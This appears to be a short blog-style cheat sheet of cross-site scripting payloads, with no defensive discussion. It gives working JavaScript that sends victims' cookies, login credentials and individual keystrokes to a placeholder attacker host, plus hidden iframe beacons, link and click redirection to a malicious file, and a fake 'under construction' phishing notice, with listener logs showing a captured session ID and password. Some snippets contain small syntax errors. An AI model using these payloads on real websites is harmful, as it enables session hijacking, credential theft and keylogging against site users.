4 minute read

Some basic XSS attacks.

Stealing Cookies

<script> new Image().src="http://AttackerIP/bogus.php?output="+document.cookie; </script>  


<script> document.location='http://AttackerIP/bogus.php?output='+document.cookie</script>

Start a netcat listener before injecting and you’ll receive the victim cookie:

# nc -nlvp 80
listening on [any] 80 ...
connect to [] from (UNKNOWN) [] 55540
GET /bogus.php?**output=PHPSESSID=tvd2ljlt16328t3ej2pqliv5e2**;%20LANG=EN_US;%20SINCE=1542307743;%20LIMIT=10;%20DOMAIN=admin HTTP/1.1
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: en-US,*

Once we get an authorised user’s cookie, we can simply use a firefox extension like Cookie Quick Manager or Cookie Editor to introduce our stolen session ID into our browser and access the web app as that user.

Browser Redirection & IFRAME Injection

<iframe SRC="http://AttackerIP/report" height = "0" width ="0"></iframe>

Once victim visits the affected output page, we’ll receive a connection on our attacking machine:

# nc -nlvp 80 
listening on [any] 80 ... 
connect to [AttackerIP] from (UNKNOWN) [Victim] 49275 
GET /report HTTP/1.1 
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* 
Accept-Language: en-US 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) 
Accept-Encoding: gzip, deflate 
Host: AttackerIP
Connection: Keep-Alive

Browser redirection may be used to redirect a victim browser to a client side attack or to an information gathering script.

Modifiying HTML

  • Changing the title of the target page to New Title.
document.getElementsByTagName("h1")[0].innerHTML = "New Title";
  • adding a new form field:
var chalForm = document.getElementsByClassName("form-signin")[0];
var input = document.createElement("input");
input.type = "text";
input.name = "PIN";
input.placeholder = "PIN";
chalForm.insertBefore(input, chalForm.childNodes[6]);

  • Changing all links on the target page to point to our attacking host, serving up the malicious file evil.txt.
var links = document.getElementsByTagName("a");
for (i=0; i < links.length; i++)
    links.[i].href = "http://AttackerIP/evil.txt";

Form Submission Hijacking

  • For the username and password variables we select the first form, indicated by forms[0].

  • We then select the first and second elements of said form, where elements[0] represents the username input field and elements[1] the password input field.

  • Data input into these fields are then assigned to their respective variables.

  • Once the form is submitted by the victim our function InterceptForm is called: document.forms[0].onsubmit = InterceptForm;.

  • We then simply send ourselves the captured credentials by leveraging Image().src and setting the value to our own HTTP server.

function InterceptForm()
    var username = document.forms[0].elements[0].value; 
    var password = document.forms[0].elements[1].value;   
    new Image().src = "http://AttackerIP/?username="+username+"&password="+password;
document.forms[0].onsubmit = InterceptForm;

Receive the credentials from our JavaScript payload:

# python -m SimpleHTTPServer 80  

... "GET /?username=victim&password=Sup3rSecP@ssw0rd HTTP/1.1" 200 -

Social Engineering

  • First we create the h2 element and input our new heading text, stating Website Under Construction.

  • Secondly, we then create the h3 element and input our malicious redirect text Please visit SuperSecureCompany.com.

  • Upon clicking, the link will send the victim to a domain/malicious file under our control.

  • We want to keep our malicious domain as close to the target domain as possible, tricking the victim into believing the site is legitimately down and following our link.

  • Lastly we append our h2 and h3 header elements to the page and remove the login form that was there orginally.

var input = document.createElement("h2");
input.innerHTML = "Website Under Construction"

var link = document.createElement("h3");
link.innerHTML = "Please visit" + " SuperSecureCompany.com".link('http://SuperSecComp.com/evil.txt');


Before injection:

After injection:

Capturing Clicks

  • We declare a function CaughtClick, with a link to our malicious URL.

  • We then add an EventListener to the document body.

  • If the victim clicks anywhere on the page whilst browsing our target site, the event listener will ‘catch’ this click and run our CaughtClick function. Sending the victim to a malicious site under our control.

  • For more information on JavaScript events, please click here.

function CaughtClick()
    location.href = "http://AttackerIP/evil.txt";
document.body.addEventListener('click', CaughtClick, true);


  • We assign the onkeypress event to our function KeyLog.

  • We then assign the victim’s input to the variable input, and parse it as an argument to the KeyLog function.

  • The key_pressed variable is assigned to a Unicode number, based on the specific key pressed by the victim, which is then converted into a character.

  • Finally, we send each value of key_pressed to our Python SimpleHTTPServer using Image().src.

document.onkeypress = function KeyLog(input)
    key_pressed = String.fromCharCode(input.which);
    new Image().src = "http://AttackerIP/?"+key_pressed;
# python -m SimpleHTTPServer 80  

... "GET /?v HTTP/1.1" 200 -
... "GET /?i HTTP/1.1" 200 -
... "GET /?c HTTP/1.1" 200 -
... "GET /?t HTTP/1.1" 200 -
... "GET /?i HTTP/1.1" 200 -
... "GET /?m HTTP/1.1" 200 -
... "GET /?  HTTP/1.1" 200 -
... "GET /?P HTTP/1.1" 200 -
... "GET /?a HTTP/1.1" 200 -
... "GET /?s HTTP/1.1" 200 -
... "GET /?s HTTP/1.1" 200 -
... "GET /?w HTTP/1.1" 200 -
... "GET /?o HTTP/1.1" 200 -
... "GET /?r HTTP/1.1" 200 -
... "GET /?d HTTP/1.1" 200 -